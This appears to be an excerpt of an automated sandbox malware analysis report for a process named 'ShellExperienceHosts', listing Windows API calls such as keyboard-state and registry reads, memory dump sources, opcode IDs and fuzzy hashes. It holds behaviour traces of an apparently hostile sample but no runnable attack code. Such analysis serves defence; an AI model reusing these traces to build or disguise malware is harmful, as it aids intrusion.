                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count
                                                                            • String ID:
                                                                            • API String ID: 879546783-0
                                                                            • Opcode ID: 92a08af33d631113d1a0c1e6beaf65aa7f47702a0dad565460f1bdef91dc4205
                                                                            • Instruction ID: c0af3319726501cee1824785e3bd0e9b79686f92117d55e1aeb2bc3da4a5ea6b
                                                                            • Opcode Fuzzy Hash: 92a08af33d631113d1a0c1e6beaf65aa7f47702a0dad565460f1bdef91dc4205
                                                                            • Instruction Fuzzy Hash: BF01A2B0601195AFDF218F76CA9C69E7EB8DB06349F104435FC15E2A00D630DE40C798
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 6C7ECF5D
                                                                            • GetKeyboardLayout.USER32(?), ref: 6C7ECF83
                                                                            • MapVirtualKeyW.USER32(?,00000000), ref: 6C7ECF90
                                                                            • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 6C7ECFAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Keyboard$LayoutStateUnicodeVirtual
                                                                            • String ID:
                                                                            • API String ID: 961187839-0
                                                                            • Opcode ID: fdb9698b9b25f8e2d7935b0813d4233d85feaab6b757db84a422c2814032279e
                                                                            • Instruction ID: 53832555c2a47650d12119845ed374008ec52b7872c10019a0f435fd8c8d129a
                                                                            • Opcode Fuzzy Hash: fdb9698b9b25f8e2d7935b0813d4233d85feaab6b757db84a422c2814032279e
                                                                            • Instruction Fuzzy Hash: 89017176600208ABDF64ABA0CD0DFDE7B78AF19748F404478B646D7580DB70AA48CB94
                                                                            APIs
                                                                            • CopyRect.USER32(00000000,00000000), ref: 6C70EFFC
                                                                            • InflateRect.USER32(00000000,000000FF,000000FF), ref: 6C70F013
                                                                            • InvalidateRect.USER32(00000000,00000000,00000000,?,00000000), ref: 6C70F027
                                                                            • UpdateWindow.USER32(00000000), ref: 6C70F030
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CopyInflateInvalidateUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 1253262389-0
                                                                            • Opcode ID: 9b04796b200c9fd304f4dce6c7d4c09040a1cfbff44a072616190de0b7970f8a
                                                                            • Instruction ID: 89a699045e5ae8e7925e71d8e5b5ea9fbe2af280e86500b1edce1c5d375cd28a
                                                                            • Opcode Fuzzy Hash: 9b04796b200c9fd304f4dce6c7d4c09040a1cfbff44a072616190de0b7970f8a
                                                                            • Instruction Fuzzy Hash: A90156B1605605ABCF20DF68CA08A9FB7F8BF49358F100639F55193590DB70E905C794
                                                                            APIs
                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,10003C4F,?,?,00000001), ref: 10004AF5
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10004B04
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10004B11
                                                                            • timeGetTime.WINMM(?,00000001,?,10003C4F,?,?,00000001), ref: 10004B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: IncrementInterlockedTimetime
                                                                            • String ID:
                                                                            • API String ID: 159728177-0
                                                                            • Opcode ID: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                            • Instruction ID: 0a1d15bd5f988d4bea10877f224db5579cb700bf5039280ae9249a62ae1a06e8
                                                                            • Opcode Fuzzy Hash: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                            • Instruction Fuzzy Hash: E20116B5601705AFD720DFBAC88098AFBF9EF4C650701892EE549CB611E771EA448FE0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 6C73CD1E
                                                                            • GetTopWindow.USER32(00000000), ref: 6C73CD2B
                                                                              • Part of subcall function 6C73CD14: GetWindow.USER32(00000000,00000002), ref: 6C73CD7A
                                                                            • GetTopWindow.USER32(?), ref: 6C73CD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item
                                                                            • String ID:
                                                                            • API String ID: 369458955-0
                                                                            • Opcode ID: 44b50668a87eea2bcb91c14d4f1770932124a5e1805bacf49b6c49d2f96c2372
                                                                            • Instruction ID: bb5ed0d29c53e5c4c22a08836175dd7bff11e378749b3712fd1235c3cd2f0c6a
                                                                            • Opcode Fuzzy Hash: 44b50668a87eea2bcb91c14d4f1770932124a5e1805bacf49b6c49d2f96c2372
                                                                            • Instruction Fuzzy Hash: 0101443111163AABDF233F618E09A8E3E746F067AAF045331FD1895512D731D51196D5
                                                                            APIs
                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                            • _free.LIBCMT ref: 1000369C
                                                                              • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                              • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                            • _malloc.LIBCMT ref: 100036D7
                                                                            • _memset.LIBCMT ref: 100036E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                            • String ID:
                                                                            • API String ID: 3340475617-0
                                                                            • Opcode ID: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
                                                                            • Instruction ID: 20f9dc9dccf48a4f32705b4407c0702e844904f7cd1830b54ea69625ce22a711
                                                                            • Opcode Fuzzy Hash: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
                                                                            • Instruction Fuzzy Hash: 8401DEF5900B44DFE360CF7AD881B97B7E9EB45254F11882EE5AE87302DA31A8048F60
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02236F08
                                                                              • Part of subcall function 02236E5A: __FF_MSGBANNER.LIBCMT ref: 02236E73
                                                                              • Part of subcall function 02236E5A: __NMSG_WRITE.LIBCMT ref: 02236E7A
                                                                              • Part of subcall function 02236E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02236E9F
                                                                            • std::exception::exception.LIBCMT ref: 02236F3D
                                                                            • std::exception::exception.LIBCMT ref: 02236F57
                                                                            • __CxxThrowException@8.LIBCMT ref: 02236F68
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID:
                                                                            • API String ID: 615853336-0
                                                                            • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                            • Instruction ID: c516d3bf2079a1268f5e608258b8706b644764114a1874fba459e62a64bf6dee
                                                                            • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                            • Instruction Fuzzy Hash: D9F0F4B142435ABADB02EBE4CC84ABD7AFEEB41704F140018E415DE0D5DFB1CAC18B59
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 031AF0E0
                                                                              • Part of subcall function 031AF032: __FF_MSGBANNER.LIBCMT ref: 031AF04B
                                                                              • Part of subcall function 031AF032: __NMSG_WRITE.LIBCMT ref: 031AF052
                                                                            • std::exception::exception.LIBCMT ref: 031AF115
                                                                            • std::exception::exception.LIBCMT ref: 031AF12F
                                                                            • __CxxThrowException@8.LIBCMT ref: 031AF140
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                            • String ID:
                                                                            • API String ID: 2388904642-0
                                                                            • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                            • Instruction ID: 1500ca657afc4ab309297e87af964cefbb58dfd7ef8083f57b4c3828dca12f01
                                                                            • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                            • Instruction Fuzzy Hash: 58F0F47D800B18ABDB15EB58DD64ABF7AAAEB48645F944068D800AA0D0DB718A03CB51
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Focus
                                                                            • String ID:
                                                                            • API String ID: 384096180-0
                                                                            • Opcode ID: e4ad6d1a11dffea391c0cdd722ceff751e17d240f0b93b4bb54b90981a4b4abb
                                                                            • Instruction ID: a792bcfb1050071e948125a0eeeadd42f7159b47f073796302f907fad942e0ab
                                                                            • Opcode Fuzzy Hash: e4ad6d1a11dffea391c0cdd722ceff751e17d240f0b93b4bb54b90981a4b4abb
                                                                            • Instruction Fuzzy Hash: ECF062726003156BCF212B74CA0C96A76BABF8521531509BEF55BD7A21EF31A8008790
                                                                            APIs
                                                                              • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                              • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                            • HeapDestroy.KERNEL32(00000000), ref: 100064A3
                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 100064B5
                                                                            • _free.LIBCMT ref: 100064C5
                                                                            • HeapDestroy.KERNEL32 ref: 100064F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                            • String ID:
                                                                            • API String ID: 4097506873-0
                                                                            • Opcode ID: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                            • Instruction ID: e941b2b67b7b789b38fb12685925c4a960f3707d906db07a4445c0daadc26747
                                                                            • Opcode Fuzzy Hash: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
                                                                            • Instruction Fuzzy Hash: 28F032B9600702ABE710CF65D848B53B7FAFF88791F218528E86987244DB35F851CBA0
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,6C873A70,00000000,00000001,00000000,00000000,?,6C86C5A6,00000000,00000000,00000000), ref: 6C874AA0
                                                                            • GetLastError.KERNEL32 ref: 6C874AAC
                                                                              • Part of subcall function 6C874AFD: CloseHandle.KERNEL32(FFFFFFFE,6C874ABC), ref: 6C874B0D
                                                                            • ___initconout.LIBCMT ref: 6C874ABC
                                                                              • Part of subcall function 6C874ADE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C874A7A,6C873A5D,00000000,?,6C86C5A6,00000000,00000000,00000000,00000000), ref: 6C874AF1
                                                                            • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6C874AD1
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: 98aaa1eee7419997c440d0cbda2bb229a5f0c2841f9bdaaf81d692094072189f
                                                                            • Instruction ID: 39cd0a6c16f3b8d17dc8407a59e7bdbc7efae572cbb494ea977532574e8eead9
                                                                            • Opcode Fuzzy Hash: 98aaa1eee7419997c440d0cbda2bb229a5f0c2841f9bdaaf81d692094072189f
                                                                            • Instruction Fuzzy Hash: 2EF01236504129BBCF722FD5CC0898D7F36FB8A3A9B054830F919A5654DA32D920EFE5
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 031A997F
                                                                              • Part of subcall function 031AF032: __FF_MSGBANNER.LIBCMT ref: 031AF04B
                                                                              • Part of subcall function 031AF032: __NMSG_WRITE.LIBCMT ref: 031AF052
                                                                            • _memcpy_s.LIBCMT ref: 031A9B42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc_memcpy_s
                                                                            • String ID: &
                                                                            • API String ID: 3561290194-3042966939
                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                            • Instruction ID: b718b1c4408bf531987633cebf8dcab1fa5932392429aa5ba96e6a0c6164cf6f
                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                            • Instruction Fuzzy Hash: EFC141F5A00A199BDB24CF59CCC0BAAB7B8EB4C301F1485A9D609A7241D774AAC5CF64
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70E84D
                                                                            • SetRectEmpty.USER32(0000E831), ref: 6C70E88D
                                                                              • Part of subcall function 6C7708FD: GetWindowLongW.USER32(?,000000F0), ref: 6C77090A
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyH_prolog3_LongParentRectWindow
                                                                            • String ID: Afx:StatusBar
                                                                            • API String ID: 531733666-3033333705
                                                                            • Opcode ID: b55ee4d49e29ff444a18d4f68b17300ed2d3e75a26e10599f0578ea8453adcb6
                                                                            • Instruction ID: 97317616772e1b6ea8995ef281b43f4c1503b6256965bac10d270dd091f694e2
                                                                            • Opcode Fuzzy Hash: b55ee4d49e29ff444a18d4f68b17300ed2d3e75a26e10599f0578ea8453adcb6
                                                                            • Instruction Fuzzy Hash: 8D4116B170522957DF289B798F4DABE25A9BF4B358B100625B851B7FC0DF20D80583F1
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F4C41
                                                                            • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 6C6F4CF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersRectSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 85510744-3916222277
                                                                            • Opcode ID: f7a5bc2de09cc05c29c1779a673fc855e278dce3fc21a36a4af239f408584646
                                                                            • Instruction ID: fc2cef9bd1b010c808b937a516f753a19568ccf4218cb6d93b13a272fc93c557
                                                                            • Opcode Fuzzy Hash: f7a5bc2de09cc05c29c1779a673fc855e278dce3fc21a36a4af239f408584646
                                                                            • Instruction Fuzzy Hash: 37518971A00218DFDF058F64C988AEE7BB2FF89314F144179EC1AAB655CB709945CFA4
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset_wcsrchr
                                                                            • String ID: D
                                                                            • API String ID: 1675014779-2746444292
                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                            • Instruction ID: 24ce5e86c16466883d0216a65f8dc931b2e5ab348816f9ddf0091d826a2955bc
                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                            • Instruction Fuzzy Hash: F731F4B6A403187BE720D7A49C89FEB776CEB48711F140125FA0AAA1C0DB759A06C6E5
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,0000007C,0000007D,00000001,?,?,00000008,6C737FF5,?,0000E831,00000000,00000004,6C74A4A1,00000002), ref: 6C7C303C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3QueryValue
                                                                            • String ID: SOFTWARE\
                                                                            • API String ID: 2373586757-3302998844
                                                                            • Opcode ID: 709018c633d00bff9d54ed7fd8905215e7e9a21092a236edabc0b287f8a98f90
                                                                            • Instruction ID: 5399fbda838664322ef34790961a12ceb216b1b782ee47e372c242d5dc6a03bd
                                                                            • Opcode Fuzzy Hash: 709018c633d00bff9d54ed7fd8905215e7e9a21092a236edabc0b287f8a98f90
                                                                            • Instruction Fuzzy Hash: 31310231701205AFDB149F65CA88EFE776AAF44708F10442AF8105BFA2CB34CD48DBA6
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C6E4BB8
                                                                            • PathFindExtensionW.SHLWAPI(?,?), ref: 6C6E4BCE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
